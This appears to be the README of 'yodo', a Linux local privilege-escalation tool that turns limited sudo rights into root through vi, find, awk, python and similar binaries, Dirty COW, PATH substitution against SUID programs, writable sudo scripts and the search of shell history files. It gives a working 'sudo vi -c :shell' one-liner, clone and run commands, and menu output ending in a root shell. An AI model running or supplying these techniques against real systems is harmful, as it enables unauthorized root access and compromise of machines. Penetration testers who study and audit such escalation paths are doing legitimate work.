yodo: Local Privilege Escalation

yodo

yodo proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.

dirty COW: exploits a race condition in the implementation of the copy-on-write mechanism Link: https://dirtycow.ninja

Pa(th)zuzu: Checks for PATH substitution vulnerabilities, logs the commands executed by the vulnerable executables and injects commands with the permissions of the owner of the process (SUID) Link: https://github.com/ShotokanZH/Pa-th-zuzu

Extra features

VSP: checks if the user is able to overwrite a sudo-enabled command with his own

History: checks for * history (like bash_history) files. You could be lucky!

b3: tries to substitute commands that has root privileges [sudo -l >>> User may run the following commands … (root) NOPASSWD: /path/to/script]

Example: If a user has sudo privileges only on vi, he could become root by running this command: sudo vi -c ‘:shell’

b3rito@victim ~/Desktop $ sudo vi -c ‘:shell’
[sudo] password for b3rito:
victim Desktop # whoami
root

Installation

git clone https://github.com/b3rito/yodo.git
chmod +x yodo.sh

Usage

./yodo.sh

Possible options (‡ excluded):
[·] find
[·] vi
[·] b3

Select From the menu:

1) Find 8) Man * 17) Pathzuzu °‡
2) AWK 10) Dirty COW °‡ 18) History °‡
3) Nmap 11) Gdb 19) Vim
4) Vi 12) Ruby 20) Lua
5) Python 13) b3 21) Ftp *
6) Irb 14) Perl 22) Credits
7) Less * 15) Tee 23) Update
8) More * 16) VSP °‡ 99) Exit

VSP = Vulnerable Script Permissions
Pathzuzu = SUID exploitation through Path vulnerability
b3 = editable root privileged commands listed in ‘sudo -l’
* user interatcion
° sudo not required
Enter Number: 1
[sudo] password for b3rito:
victim Desktop # whoami
root
victim Desktop #

Author

Written by b3rito at mes3hacklab

Source: https://github.com/b3rito/